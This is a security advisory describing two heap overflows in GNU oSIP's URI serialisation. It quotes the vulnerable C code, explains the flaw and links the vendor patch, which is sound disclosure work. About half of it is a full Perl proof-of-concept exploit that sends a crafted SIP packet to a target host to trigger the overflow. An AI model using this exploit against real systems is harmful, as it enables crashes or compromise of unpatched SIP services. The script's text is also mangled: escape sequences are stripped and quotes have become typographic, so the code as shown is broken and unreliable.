‘GNU oSIP URI Parsing Heap Overflows’

Summary

Two exploitable heap overflows were discovered by Beyond Security’s automated and innovative vulnerability discovering tool, beSTORM.

beSTORM quickly discovered two exploitable heap overflows in GNU oSIP, an open source library implementation of SIP. These heap overflows can be used to overwrite arbitrary heap content and modify the execution path of the program once the library tries to free the allocated heap memory.’

Credit:

‘The information has been provided by beSTORM.’


Details

Vulnerable Systems:
 * liboSIP version 2.0.6 and prior

Immune Systems:
 * liboSIP version 2.0.7 or newer

Technical Details:
Inside the osip_uri.c file the function osip_uri_to_str() determines the size of the buffer to allocate by doing the following calculations:

  if (url->username != NULL)
    len = len + strlen(url->username) + 10; /* count escaped char */
  if (url->password != NULL)
    len = len + strlen(url->password) + 10;

buf = (char *) osip_malloc (len);
  if (buf == NULL)
    return -1;
  tmp = buf;

  if (url->username != NULL)
    {
      char *tmp2 = __osip_uri_escape_userinfo (url->username);

      sprintf (tmp, ‘%s’, tmp2);
      osip_free (tmp2);
      tmp = tmp + strlen (tmp);
    }

However, the two calculations above do not take into account that the url->username and ur->password variables can contain characters that require escaping and that their eventual size requirement would be larger than strlen(url->username) + 10 and strlen(url->password) + 10 respectively.

For example, the username ‘<‘ (lower than) would get encoded into %3C, taking three times the length returned by strlen(url->username).

Therefore, if an attacker provides 6 time the character ‘<‘ (lower than) the strlen() function would return 6, adding to it a value of 10 would result in the length of 16, while the encoded content’s length would result in 6*3=18 meaning that we are overflowing the allocated space.

Patch:
The vendor has patched the latest version and has made a diff file of the patch:
http://savannah.gnu.org/cgi-bin/viewcvs/osip/osip/src/osipparser2/osip_uri.c.diff?r1=1.5&r2=1.6

About beSTORM:
beSTORM can break apart a documented protocol, such as SIP, and generate millions of different attack vectors. The result is a comprehensive check of the protocol implementation and the resistance of the product to buffer overflow and similar remote attacks.

beSTORM Against sipD:
beSTORM’s SIP testing module has been previously launched against another the open source product sipD. In that occasion beSTORM was able to detect the existence of two security vulnerabilities, a format string (https://securiteam.com/unixfocus/6R00G1595S.html) and denial of service (https://securiteam.com/unixfocus/6B00F0A95O.html).

Exploit:
The following exploit was automatically generated by beSTORM based on the sequence required to trigger the vulnerabilities. We have consolidated the two different attacks – the username heap overflow and the password heap overflow into one script.

#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-04-12 13:06
# Copyright Beyond Security Ltd.

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;
my $repeated_type = ‘<‘;

if (!$target)
{
 usage();

 print ‘No target has been supplied, reverting to 192.168.1.1.n’;
 $target = ‘192.168.1.1’;
}

my $repeating = shift;
if (!$repeating )
{
 usage();

 print ‘Repeating has not been supplied, reverting to 10.n’;
 $repeating = 10;
}

my $attackerip = shift;
if (!$attackerip)
{
 usage();

 print ‘Attacker IP address has not been supplied, reverting to 192.168.1.2.n’;
 $attackerip = ‘192.168.1.2’;
}

my $attackedip = shift;
if (!$attackedip)
{
 usage();
 
 print ‘Contact IP address has not been supplied, reverting to 192.168.1.3.n’;
 $attackedip = ‘192.168.1.3’;
}

print ‘Will attack $target.n’;
print ‘Attacker IP address defined as: $attackeripn’;
print ‘Attacked IP address defined as: $attackedipn’;
print ‘Will repeat ‘<‘ $repeating timesn’;

my $repeated_data = ($repeated_type x $repeating);
my $target_port = 5060;

my $packet =<<END;
SUBSCRIBE sip:$repeated_data:$repeated_data@$attackerip SIP/2.0r
To: <sip:$attackedip:$target_port>r
Via: SIP/2.0/UDP $attackedip:3277r
From: ‘STORM'<sip:$attackedip:3277>r
Call-ID: 1STORM9210@$attackedipr
CSeq: 1 INVITEr
Max-Forwards: 70r
Contact: <sip:$attackerip:5059>r
r
END

print ‘Sending: [$packet]n’;

socket(PING, PF_INET, SOCK_DGRAM, getprotobyname(‘udp’));

my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);

send(PING, $packet, 0, $sendto) == length($packet) or die ‘cannot send to $target : $target_port : $!n’;

print ‘Done.n’;

sub usage
{
 if ($print_usage) { return; }
 $print_usage = 1;
 print (‘#’x50);
 print ‘n’;
 print ‘# $0 [hostname] [repeater] [attackerip] [attackedip]n’;
 print ‘# hostnamet-tThe host the packet will be sent to.n’;
 print ‘# repeatert-tThe number of times the character will be sent (repeated character $repeated_type).n’;
 print ‘# attackeript-tThe IP address from which the packet should ben’;
 print ‘tttaddressed from (doesn’t have to be your IP address).n’;
 print ‘# attackedipt-tThe IP address that you are contactingn’;
 print ‘ttt(doesn’t have to be the hostname IP’s address).n’;
 print ‘n’;
 print ‘Results may vary depending on how the remote host handles packets.n’;
 print ‘For example:n’;
 print ‘ * Some SIP Proxies won’t look into packets addressed to it (attackedip or attackerip).n’;
 print ‘ * Some SIP Routers won’t handle packets that aren’t addressed to it.n’;
 print ‘etcn’;
 print ‘n’;
}’

Categories: News